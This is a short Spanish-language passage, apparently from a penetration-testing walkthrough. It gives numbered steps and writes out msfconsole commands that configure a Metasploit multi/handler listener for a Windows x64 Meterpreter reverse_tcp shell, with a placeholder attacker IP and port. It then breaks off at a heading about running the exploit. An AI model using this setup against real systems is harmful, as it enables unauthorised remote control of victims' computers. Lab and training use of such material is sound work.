4) Configuración de listener (multi/handler) de reverse shell.
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker-IP-address>
set LPORT <listen-local-port>
run -j
5) Ejecución de exploit y obtención de reverse shell.